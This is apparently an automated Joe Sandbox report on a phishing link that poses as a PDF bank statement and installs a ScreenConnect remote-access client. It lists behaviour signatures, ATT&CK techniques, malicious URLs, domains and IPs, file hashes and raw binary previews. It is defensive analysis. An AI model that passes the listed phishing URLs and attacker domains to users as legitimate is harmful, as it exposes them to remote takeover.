                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: Yara matchFile source: 0000000C.00000002.1484985430.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.1517220896.0000000000A72000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.1466317560.00000000009A6000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1476357184.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Windows\Installer\MSI719A.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, type: DROPPED
                      Source: Yara matchFile source: 00000014.00000002.2397940469.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media
                      1
                      Windows Management Instrumentation
                      1
                      Component Object Model Hijacking
                      1
                      Component Object Model Hijacking
                      22
                      Masquerading
                      OS Credential Dumping3
                      Security Software Discovery
                      Remote ServicesData from Local System2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      2
                      Windows Service
                      2
                      Windows Service
                      21
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      51
                      Virtualization/Sandbox Evasion
                      Security Account Manager51
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      DLL Side-Loading
                      1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      NTDS11
                      Peripheral Device Discovery
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading
                      1
                      Rundll32
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials23
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html0%Avira URL Cloudsafe
                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI67F5.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                      C:\Windows\Installer\MSI73FE.tmp0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.google.com
                      142.250.181.68
                      truefalse
                        high
                        silvervalleyrealestategh.com
                        170.10.161.77
                        truefalse
                          unknown
                          ci3.googleusercontent.com
                          172.217.17.33
                          truefalse
                            high
                            rjpanelplus.top
                            194.59.31.199
                            truefalse
                              unknown
                              s3-r-w.eu-central-1.amazonaws.com
                              3.5.137.142
                              truefalse
                                unknown
                                electroagrotech.com.ua
                                88.218.28.52
                                truefalse
                                  unknown
                                  tmqw21a.zapto.org
                                  unknown
                                  unknownfalse
                                    unknown
                                    cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlfalse
                                        unknown
                                        https://electroagrotech.com.ua/wp-content/uploads/elementor/css/false
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          88.218.28.52
                                          electroagrotech.com.uaUkraine
                                          50673SERVERIUS-ASNLfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          172.217.17.33
                                          ci3.googleusercontent.comUnited States
                                          15169GOOGLEUSfalse
                                          172.217.17.35
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.17.46
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          216.58.208.227
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          194.59.31.199
                                          rjpanelplus.topGermany
                                          30823COMBAHTONcombahtonGmbHDEfalse
                                          23.218.208.109
                                          unknownUnited States
                                          6453AS6453USfalse
                                          74.125.205.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          142.250.181.68
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          3.5.137.142
                                          s3-r-w.eu-central-1.amazonaws.comUnited States
                                          16509AMAZON-02USfalse
                                          170.10.161.77
                                          silvervalleyrealestategh.comUnited States
                                          32748STEADFASTUSfalse
                                          IP
                                          192.168.2.16
                                          127.0.0.1
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1563384
                                          Start date and time:2024-11-26 22:38:43 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:26
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal64.evad.win@49/41@23/135
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 74.125.205.84
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):4.9739376290794715
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5A9944427C35328CB2D7E201CD705C32
                                          SHA1:C58F7761A80CC65E12CC48AD459151DD7E02B2EA
                                          SHA-256:333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
                                          SHA-512:AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):257
                                          Entropy (8bit):4.896176001960815
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                          SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                          SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                          SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):50133
                                          Entropy (8bit):4.759054454534641
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D524E8E6FD04B097F0401B2B668DB303
                                          SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                          SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                          SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):26722
                                          Entropy (8bit):7.7401940386372345
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5CD580B22DA0C33EC6730B10A6C74932
                                          SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                          SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                          SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):197120
                                          Entropy (8bit):6.58476728626163
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AE0E6EBA123683A59CAE340C894260E9
                                          SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                          SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                          SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):68096
                                          Entropy (8bit):6.068776675019683
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                          SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                          SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                          SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):95520
                                          Entropy (8bit):6.505346220942731
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:361BCC2CB78C75DD6F583AF81834E447
                                          SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                          SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                          SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):548864
                                          Entropy (8bit):6.031251664661689
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:16C4F1E36895A0FA2B4DA3852085547A
                                          SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                          SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                          SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):260168
                                          Entropy (8bit):6.416438906122177
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                          SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                          SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                          SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):61216
                                          Entropy (8bit):6.31175789874945
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6DF2DEF5E591E2481E42924B327A9F15
                                          SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                          SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                          SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):601376
                                          Entropy (8bit):6.185921191564225
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:20AB8141D958A58AADE5E78671A719BF
                                          SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                          SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                          SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
